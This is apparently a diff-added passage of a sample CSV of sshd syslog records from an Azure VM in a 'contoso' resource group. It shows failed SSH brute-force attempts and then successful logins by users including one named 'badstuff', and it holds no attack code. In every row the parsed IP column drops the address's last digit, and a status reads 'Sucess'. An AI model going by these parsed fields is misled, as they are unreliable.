+7399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:09,UbuntuDevEnv,2019-06-26 18:16:09,auth,UbuntuDevEnv,info,Disconnected from invalid user files 80.108.220.67 port 41492 [preauth],61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,files,80.108.220.6,41492,,
+7400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:09,UbuntuDevEnv,2019-06-26 18:16:09,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 41492:11: Bye Bye [preauth],61209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,41492,,
+7401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:33,UbuntuDevEnv,2019-06-26 18:16:32,auth,UbuntuDevEnv,info,Invalid user dirtydave from 165.227.41.202 port 38572,61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dirtydave,165.227.41.2,38572,,
+7402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:33,UbuntuDevEnv,2019-06-26 18:16:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:33,UbuntuDevEnv,2019-06-26 18:16:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+7404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:34,auth,UbuntuDevEnv,info,Invalid user etienne from 54.37.66.73 port 42988,61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,54.37.66.7,42988,,
+7405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+7406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:34,auth,UbuntuDevEnv,info,Failed password for invalid user dirtydave from 165.227.41.202 port 38572 ssh2,61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dirtydave,165.227.41.2,38572,,
+7408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:35,auth,UbuntuDevEnv,info,Disconnected from invalid user dirtydave 165.227.41.202 port 38572 [preauth],61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dirtydave,165.227.41.2,38572,,
+7409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:35,UbuntuDevEnv,2019-06-26 18:16:35,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 38572:11: Bye Bye [preauth],61312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,38572,,
+7410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:37,UbuntuDevEnv,2019-06-26 18:16:36,auth,UbuntuDevEnv,info,Failed password for invalid user etienne from 54.37.66.73 port 42988 ssh2,61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,54.37.66.7,42988,,
+7411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:37,UbuntuDevEnv,2019-06-26 18:16:36,auth,UbuntuDevEnv,info,Disconnected from invalid user etienne 54.37.66.73 port 42988 [preauth],61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,54.37.66.7,42988,,
+7412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:37,UbuntuDevEnv,2019-06-26 18:16:36,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 42988:11: Bye Bye [preauth],61329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,42988,,
+7413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:40,UbuntuDevEnv,2019-06-26 18:16:40,auth,UbuntuDevEnv,info,Invalid user pulse from 107.175.127.237 port 32806,61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,107.175.127.2,32806,,
+7414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:40,UbuntuDevEnv,2019-06-26 18:16:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:40,UbuntuDevEnv,2019-06-26 18:16:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+7416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:43,UbuntuDevEnv,2019-06-26 18:16:42,auth,UbuntuDevEnv,info,Failed password for invalid user pulse from 107.175.127.237 port 32806 ssh2,61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,107.175.127.2,32806,,
+7417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:43,UbuntuDevEnv,2019-06-26 18:16:43,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 32806:11: Bye Bye [preauth],61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,32806,,
+7418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:43,UbuntuDevEnv,2019-06-26 18:16:43,auth,UbuntuDevEnv,info,Disconnected from invalid user pulse 107.175.127.237 port 32806 [preauth],61346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,107.175.127.2,32806,,
+7419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:58,UbuntuDevEnv,2019-06-26 18:16:58,auth,UbuntuDevEnv,info,Invalid user aq from 157.230.190.1 port 43840,61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aq,157.230.190.1,43840,,
+7420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:58,UbuntuDevEnv,2019-06-26 18:16:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:16:58,UbuntuDevEnv,2019-06-26 18:16:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+7422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:17:01,UbuntuDevEnv,2019-06-26 18:17:01,auth,UbuntuDevEnv,info,Failed password for invalid user aq from 157.230.190.1 port 43840 ssh2,61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aq,157.230.190.1,43840,,
+7423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:17:01,UbuntuDevEnv,2019-06-26 18:17:01,auth,UbuntuDevEnv,info,Disconnected from invalid user aq 157.230.190.1 port 43840 [preauth],61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aq,157.230.190.1,43840,,
+7424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:17:01,UbuntuDevEnv,2019-06-26 18:17:01,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 43840:11: Bye Bye [preauth],61411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,43840,,
+7425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 21:54:29,UbuntuDevEnv,2019-06-10 21:54:29,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.89 port 36052,12128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,36052,,
+7426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 21:54:30,UbuntuDevEnv,2019-06-10 21:54:29,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.89 port 36052: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",12128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,36052,,
+7427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 23:42:26,UbuntuDevEnv,2019-06-10 23:42:25,auth,UbuntuDevEnv,info,Invalid user admin from 112.86.109.216 port 13305,36014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,112.86.109.2,13305,,
+7428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 23:42:34,UbuntuDevEnv,2019-06-10 23:42:34,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 112.86.109.216 port 13305 ssh2 [preauth],36014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,112.86.109.2,13305,,
+7429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 23:42:34,UbuntuDevEnv,2019-06-10 23:42:34,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 112.86.109.216 port 13305: Too many authentication failures [preauth],36014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,112.86.109.2,13305,,
+7430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 23:52:43,UbuntuDevEnv,2019-06-10 23:52:43,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.161 port 23597:11:  [preauth],38295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,23597,,
+7431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-10 23:52:43,UbuntuDevEnv,2019-06-10 23:52:43,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 218.92.0.161 port 23597 [preauth],38295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,218.92.0.1,23597,,
+7432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:05:52,UbuntuDevEnv,2019-06-11 00:05:52,auth,UbuntuDevEnv,info,Received disconnect from 104.236.122.193 port 40607:11: Bye Bye [preauth],41156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.236.122.1,40607,,
+7433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:05:52,UbuntuDevEnv,2019-06-11 00:05:52,auth,UbuntuDevEnv,info,Disconnected from 104.236.122.193 port 40607 [preauth],41156,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.236.122.1,40607,,
+7434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:24:53,UbuntuDevEnv,2019-06-11 00:24:53,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 40.118.187.26 port 62326 [preauth],45206,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,40.118.187.2,62326,,authenticating
+7435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:55,UbuntuDevEnv,2019-06-11 00:26:55,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.160.182 port 8804 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,45660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.160.1,8804,,
+7436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:55,UbuntuDevEnv,2019-06-11 00:26:55,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),45660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:55,UbuntuDevEnv,2019-06-11 00:26:55,auth,UbuntuDevEnv,info,New session 262 of user peteb.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:55,UbuntuDevEnv,2019-06-11 00:26:55,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:57,UbuntuDevEnv,2019-06-11 00:26:56,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.160.182 port 44070 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,45671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.160.1,44070,,
+7440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:57,UbuntuDevEnv,2019-06-11 00:26:56,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),45671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+7441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:26:57,UbuntuDevEnv,2019-06-11 00:26:56,auth,UbuntuDevEnv,info,New session 264 of user peteb.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+7442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:32,UbuntuDevEnv,2019-06-11 00:27:32,auth,UbuntuDevEnv,info,Received signal 15  terminating.,1455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:32,UbuntuDevEnv,2019-06-11 00:27:32,auth,UbuntuDevEnv,info,Server listening on :: port 22.,46149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,22,,
+7444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:32,UbuntuDevEnv,2019-06-11 00:27:32,auth,UbuntuDevEnv,info,Server listening on 0.0.0.0 port 22.,46149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,0.0.0.0,22,,
+7445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:44,UbuntuDevEnv,2019-06-11 00:27:43,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user badstuff by (uid=0),46170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:44,UbuntuDevEnv,2019-06-11 00:27:43,auth,UbuntuDevEnv,info,Accepted password for badstuff from 52.160.127.112 port 58848 ssh2,46170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,52.160.127.1,58848,,
+7447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:44,UbuntuDevEnv,2019-06-11 00:27:43,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user badstuff by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:44,UbuntuDevEnv,2019-06-11 00:27:43,auth,UbuntuDevEnv,info,New session 266 of user badstuff.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:48,UbuntuDevEnv,2019-06-11 00:27:48,auth,UbuntuDevEnv,info,Received disconnect from 52.160.127.112 port 58848:11: disconnected by user,46279,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.160.127.1,58848,,user
+7450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:48,UbuntuDevEnv,2019-06-11 00:27:48,auth,UbuntuDevEnv,info,Removed session 266.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:48,UbuntuDevEnv,2019-06-11 00:27:48,auth,UbuntuDevEnv,info,Disconnected from user badstuff 52.160.127.112 port 58848,46279,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,52.160.127.1,58848,,
+7452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:48,UbuntuDevEnv,2019-06-11 00:27:48,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user badstuff,46170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:54,UbuntuDevEnv,2019-06-11 00:27:53,auth,UbuntuDevEnv,info,Accepted password for badstuff from 52.160.127.112 port 58892 ssh2,46306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,52.160.127.1,58892,,
+7454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:54,UbuntuDevEnv,2019-06-11 00:27:53,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user badstuff by (uid=0),46306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:54,UbuntuDevEnv,2019-06-11 00:27:53,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user badstuff by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:54,UbuntuDevEnv,2019-06-11 00:27:53,auth,UbuntuDevEnv,info,New session 268 of user badstuff.,1259,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:57,UbuntuDevEnv,2019-06-11 00:27:56,auth,UbuntuDevEnv,info,Disconnected from user badstuff 52.160.127.112 port 58892,46409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,52.160.127.1,58892,,
+7458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:57,UbuntuDevEnv,2019-06-11 00:27:56,auth,UbuntuDevEnv,info,Received disconnect from 52.160.127.112 port 58892:11: disconnected by user,46409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.160.127.1,58892,,user
+7459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 00:27:57,UbuntuDevEnv,2019-06-11 00:27:56,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user badstuff,46306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
